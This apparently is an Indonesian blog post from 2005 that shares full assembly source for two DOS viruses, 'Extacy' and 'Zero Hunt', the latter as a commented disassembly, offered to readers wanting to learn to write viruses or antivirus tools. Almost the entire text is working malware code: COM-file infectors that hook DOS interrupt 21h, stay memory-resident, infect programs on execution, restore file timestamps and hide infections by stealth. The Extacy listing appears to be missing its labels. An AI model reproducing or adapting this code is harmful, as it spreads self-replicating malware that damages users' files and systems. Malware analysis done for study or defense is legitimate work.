artikel ini saya ambil pada Date: Sunday, December 18, 2005 Hits: 12049 By: Sibie Project
Bagi yang ingin mempelajari bagaimana membuat virus ataupun antivirus, pada kesempatan kali ini di bagikan source code virus Extacy dan Zero Hunt.Setidaknya sebagian ilmu dan teknik dapat diambil dari ke2 virus di bawah ini.
Virus Extacy ------------------------------------------------------------------------
.model tiny
.radix 16
viruslength = heap - _small
startload = 90 * 4
call relative
oldheader dw 020cdh
dw 0bh dup (0)
pop bp
push ds
push es
xor ax,ax
mov ds,ax
mov es,ax
mov di,startload
cmp word ptr ds:[di+25],di
jz exit_small
lea si,[bp-3]
mov cx,viruslength
db 2Eh
rep movsb
mov di,offset old21 + startload
mov si,21*4
push si
pop di
mov ax,offset int21 + startload
xchg ax,cx
pop es
pop ds
or sp,sp
jnp returnCOM
mov di,100
push di
mov si,bp
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
mov ax,3d02
int 21
xchg ax,bx
push cs
pop ds
push cs
pop es
mov ax,5700h
int 21h
push cx
push dx
mov si,offset oldheader+startload
mov ah,3f
mov cx,18
push cx
mov dx,si
int 21
cmp ax,cx
jnz go_already_infected
mov di,offset target + startload
push di
rep movsb
pop di
mov ax,4202
int 21
cmp ds:[di],'ZM'
jz infectNOT
cmp ds:[di],'MZ'
jz infectNOT
sub ax,3
mov byte ptr ds:[di],0e9
mov ds:[di+1],ax
sub ax,viruslength
cmp ds:[si-17],ax
jnz finishinfect
pop cx
jmp short already_infected
db "EXTASY!"
db "(c) Metal Militia / Immortal Riot"
cmp ax,4b00
jz kewl
cmp ax,3e00
jnz oops
mov ah,45
int 21
jmp kewl
jmp chain
jmp go_already_infected
jmp infect
mov cx,viruslength
mov dx,startload
mov ah,40
int 21
mov ax,4200
xor cx,cx
int 21
mov ah,40
mov dx,di
pop cx
int 21
pop dx
pop cx
mov ax,5701h
int 21h
mov ah,3e
int 21
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
db 0ea
old21 dw ?, ?
target dw 0ch dup (?)
end _small
Virus Zero Hunt-------------------------------------------------------------------- CSEG SEGMENT
org 100h
; Zerohunt virus
; Disassembly by PRiEST
; 4-15-93
CMC_JMP equ 0e9f5h ;This is the virus's signature
;which is located at the beginning
;of infected files, it consist of
;a CMC and a JMP
Mem_Loc equ 21ch ;offset of virus in memory
Zero_Size equ offset Zero_End-offset Zero_Start ;Size of virus
Zero_File_Size equ offset Zero_File_End-offset Zero_Start ;Size of virus in
IVT_21 equ 21h*4h ;offset of Int 21h in IVT
IVT_24 equ 24h*4h ;offset of Int 24h in IVT
Mem_Size equ 413h ;offset of Memory size in BIOS area
Zerohunt: jmp Zero_Start ;Dummy code
org 21ch ;set new origin
Zero_Start: call $+3 ;Push IP
pop si ;pop IP into SI
mov es,ax ;ES = segemnt zero
mov di,Mem_Loc ;Offset of memory resident code
cmp byte ptr es:[di],0e8h ;This instructions checks to see
;if the virus is already in memory
;by looking for the call at
;Zero_Start in the IVT
je Jump_File ;return control to file if in memory
mov cx,Zero_Size ;size of virus
sub si,3h ;Find offset of Zero_Start
rep movsb ;copy us to IVT
push es
pop ds ;DS = 0
mov bx,IVT_21 ;offset of Interrupt 21 in the IVT
les si,ds:[bx] ;Get seg:off of Int 21h
mov word ptr ds:[bx],offset Zero_21 ;Point Int 21h to us
mov word ptr ds:[bx+2h],ax ;point Int 21h to segment 0
mov word ptr ds:[Old_21+2h],es ;Save Int 21h
mov word ptr ds:[Old_21],si ;Save Int 21h
mov al,40h ;40h k
mov bx,ds:[Mem_Size] ;Get amount of memory in k's
sub bx,ax ;subtract 40h to get segment of mem
mul bx ;find address of free memory
mov word ptr ds:[High_Mem],ax ;Save segment address
xor ax,ax ;Zero out AX
Jump_File: push cs
push cs
pop ds ;Restore DS and ES
pop es
;Self-modifying code that restores the first 4 bytes of an infected .com
;file. The Jump_Data defines where to jump when the virus is done, this
;is because it only infects files that have a JMP (0e9h) as the first
;instruction, any other file gets ignored.
db 0c7h,6,0,1 ;mov word ptr ds:[100h],
File_Data dw 20cdh ;quit to DOS
db 0c7h,6,2,1 ;mov word ptr ds:[102h],
File_Data_2 dw 9090h ;NOPs
db 0e9h ;Jump
;This is where the infected program originally jumped to, right now it's
;set back to the beginning so that it will terminate to DOS.
Jump_Data dw 0-(offset Jump_Data_End-offset Zero_Start)
Jump_Data_End: ;used to find offset of Zero_Start
Random_Read: pushf ;Keep stack in order when IRET
push cs ;return to this segment
call Jump_21 ;Call DOS to read file
push ax
push es
push bx
push ds ;save registers
mov ah,2fh ;Get address of DTA into ES:BX
int 21h
push es
pop ds ;DTA segment in DS
cmp word ptr ds:[bx],CMC_JMP ;Is this file infected?
jne Skip_Block_Clean
call Stealth ;Hide virus
Skip_Block_Clean:pop ds
pop bx
pop es
pop ax ;Pop registers
jmp Fix_Flags_Ret ;Fix flags and return
Handle_Read: pushf ;Keep stack right
push cs ;return to this segment
call Jump_21
pushf ;Save flags
jb Fix_Flags_Ret
xchg dx,bx ;Address of data read into BX
cmp word ptr ds:[bx],CMC_JMP ;File infected?
jne Fix_Flags_DX
cmp word ptr ds:[bx+2h],ax ;is it valid (? I guess)
jnb Fix_Flags_DX
call Stealth ;Hide virus
Fix_Flags_DX: xchg dx,bx ;restore registers
Fix_Flags_Ret: popf ;POP flags
push bp
push ax ;Save registers
pop ax ;tranfer flags to ax
mov bp,sp ;get stack frame
mov ss:[bp+8h],ax ;Save flags directly into stack
pop ax
pop bp ;POP registers
Stealth: push si ;Save register
mov si,bx ;Where code was read to
add si,ds:[bx+2h] ;Where virus is in program
push word ptr ds:[si+File_Data-Zero_Start] ;original bytes
pop word ptr ds:[bx] ;restore them
push word ptr ds:[si+File_Data_2-Zero_Start] ;original bytes
pop word ptr ds:[bx+2h] ;restore them too
add si,4h ;fix for jump
push ax
push cx ;save registers
mov cx,Zero_Size ;Size of virus
xor al,al ;Zero out AL
Stealth_Loop: mov byte ptr ds:[si],al ;Remove virus from file
inc si
loop Stealth_Loop
pop cx
pop ax
pop si ;Pop registers
Zero_21: cmp ah,21h ;Random read?
je Random_Read
cmp ah,27h ;Random Block read?
je Random_Read
cmp ah,3fh ;Handle read?
je Handle_Read
cmp ax,4b00h ;Execute program?
je Infect
jmp Jump_21 ;Jump to original Int 21h
Infect: push es ;save registers
push ax
push bx
push dx
push ds
mov ax,3d02h ;open file for writing
int 21h
xchg ax,bx ;handle into BX
mov ah,3fh ;read from file
xor cx,cx ;Zero CX
mov ds,cx ;zero into DS
inc cx ;read one byte
mov dx,offset Buffer ;read to variable "buffer"
mov si,dx ;same into SI
pushf ;Keep stack straight after IRET
push cs ;Push CS for Far return
call Jump_21 ;Call original Interrupt 21
cmp byte ptr ds:[si],0e9h ;Is the first instruction a jump?
je File_Has_Jump
jmp Close_File ;File is not valid, close and quit
File_Has_Jump: mov ax,4200h ;Set position from start of file
dec cx ;CX now equals 0
xor dx,dx ;DX also equals 0
int 21h ;set file position to start of file
pop ds
pop dx ;POP location of file name
push dx
push ds ;PUSH them back
push bx ;Save file handle number
push cs
pop es ;Set ES to our CS
mov bx,offset High_Mem ;offset of variable High_Mem
mov ax,4b03h ;Load file
int 21h
mov ds,es:[bx] ;Get address of High memory
mov cx,Zero_File_Size ;size of virus in File
mov dx,cx ;same into DX
mov bx,ds:[1h] ;Get jump address
mov bp,bx ;I don't recall BP being saved!!!
xor al,al ;zero out AL
Search_Loop: dec bx ;decrement pointer
pop di ;Pop handle
je Close_File_DI
push di ;Save handle again
cmp byte ptr ds:[bx],al ;search for zeros
je Search_Looper
mov cx,dx ;reset counter
Search_Looper: loop Search_Loop ;Scan for size of virus
mov di,bp ;Get jump address of file
sub di,bx ;minus location of zeros
sub di,offset Jump_Data_End-offset Zero_Start ;Make jump
mov word ptr cs:[Jump_Data],di ;Save original jump address
push word ptr ds:[0] ;save original bytes
pop word ptr cs:[File_Data] ;Into our own code
push word ptr ds:[2h] ;again with bytes 3 and 4
pop word ptr cs:[File_Data_2]
mov si,Mem_Loc ;location of virus in memory
mov cx,dx ;Size of virus in file
dec cx ;Size of virus
push ds
pop es ;ES = segment of free memory
push cs
pop ds ;DS = our segment
mov di,bx ;offset of free space in file
rep movsb ;copy virus into file (I gather)
sub bx,4h ;subtract for jump to virus
mov word ptr es:[2h],bx ;Fix jump
mov word ptr es:[0],CMC_JMP ;CMC, then JMP
mov di,0cfcfh
lds si,ds:[IVT_24] ;fetch address of Int 24h
xchg di,ds:[si] ;what the hey!? Computer should
;crash if Int 24h is triggered!
pop bx ;POP handle number
mov ax,5700h ;Get date
int 21h
push cx
push dx ;save original date/time of file
push es
pop ds ;DS = segment of free memory
mov ah,40h
mov cx,bp ;size of virus
xor dx,dx
int 21h ;write to file, I guess the virus
pop dx
pop cx ;POP the date/time
mov ax,5701h ;restore date/time to file
int 21h
xchg di,bx ;dummy exchange if infection ok
Close_File_DI: xchg di,bx ;retore handle from DI for closing
Close_File: mov ah,3eh ;close file
int 21h
lds si,cs:[IVT_24] ;Get Int 24h address from IVT
cmp byte ptr ds:[si],0cfh ;Is it to us?
jne No_24_Restore ;I know, they're Shitty labels
xchg di,ds:[si] ;restore Int 24h
No_24_Restore: pop ds
pop dx
pop bx
pop ax
pop es ;Pop all registers
Jump_21: db 0eah ;jmp seg:off
Old_21 dd ? ;segment offset of Int 21h
Buffer db ?
High_Mem dw ? ;Segment of availible memory
END Zerohunt
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